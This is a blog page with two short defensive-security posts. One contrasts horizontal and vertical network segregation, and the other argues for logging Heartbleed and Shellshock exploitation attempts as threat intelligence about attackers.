Follow Me!

Thursday, January 1, 2015

Horizontal versus Vertical Network Segregation

Originally we considered looking at security from a "ring" perspective.  This shouldn't be surprising, given that since the beginning of time, humans have created rings for safety.  The moat, the castle, especially on a hill - meant safety

So, we have the same situation in infosec.   If we create a perimeter, then ostensibly, we have security. 

However, in today's networked world - we have numerous ways in which our perimeter gets distended.   AWS instances,  mobile devices,  federated identity,  BYOD - you name it.

Thinking of your network as permeable requires that you construct defenses (preventive controls) WITHIN the network - and segregating the internal network is one of those approaches.  I've written about this elsewhere, but utilizing subnets for mission critical infrastructure, sensitive data and other important assets and protecting those "enclaves" is a valid strategy.

This is akin to the "tiering" approach for web applications, where web servers reside in the DMZ and are separated from middleware/business logic layers and data stores.  I think of this as "horizontal segregation"  where the function of the asset dictates its placement in an enclave.  So a data store layer that has your databases in a secure segregated enclave would be a good example.  

But - how about vertical segregation?   If we assume that applications have multi tiers internally - does layer 3/4 segregation mean anything anymore?  We all know that firewalls and network layer controls are ineffective against web application attacks.   The application allows us to interact with it over port 80/443 and allows us to touch the data store in the "back end".

From my perspective, providing security for hosting/data center solutions -  vertical segregation is how we keep multiple tenants from touching each other's data.   It also has the effect of isolating a particular service, website, or web application from OTHER services, web 

So how do we enable communication between hosts in the back end then?  Do we provide a management backplane of connectivity that allows data to flow between endpoints?  Or can we force all data transfers out the front door to our edge router, which then sends it to application B's "front end?"

Food for thought?


Threat intelligence, Part 2

This year has been very interesting in terms of massive, critical vulnerabilities in some of the fundamental technologies  and protocols that underpin the Internet, (Heartbleed and Poodle) and in some of the foundational software packages that comprise our computing platforms (Bash - shellshock).

As a practitioner who has had to scramble around to patch these systems, some interesting artifacts have arisen which got me to thinking about threat intelligence.  In addition to patching machines, we were aware that some of these vulnerabilities had been around for some time before public disclosure.   Even after public disclosure, there was some period of time before patches were available for all the affected platforms that an enterprise would possibly have in their environment.

Which leads me to this:   these types of vulnerabilities can potentially serve as a way to identify your adversaries.   Think of it -  if you have an adversary who wants to get into your network and a vulnerability like heartbleed or shellshock becomes known, don't you think they want to probe you immediately to see if they can use the period in between vulnerability and patch to compromise your systems?

From a vulnerability management perspective, this is why compensating controls are so important.   You must protect yourself while you are waiting for that patch.

However, I would make the point that it is extremely important to also log any attempts to take advantage of the vulnerability in as verbose a fashion as possible.  If you have the choice of two different compensating controls and one gives you a better view/more intelligence about the attacking party - choose that one (actually, choose both!)

Different types of attacks can provide more detailed intelligence on your attackers

Heartbleed didn't really give us much in the way of telemetry about our attackers, mostly because in the early period after the disclosure, there wasn't a good way of detecting probes.  Later, there were some signatures for IDS.   At best, you'd get some idea of the IP addresses that were probing you. And as we all know, IP does not provide strong attribution.   Using it to identify your adversaries is not a winning strategy.

Shellshock gave us a lot more to go on.   Attackers had to craft "attack strings" to take advantage of the vulnerability and these strings appeared in web logs.  Reviewing logs could give us some idea of the attackers approach:

Tool repositories
preferred commands
desired targets - both hosts and the files on them.

Now, these are the kinds of Tactics, Techniques, and Procedures that provide better identification of your attackers.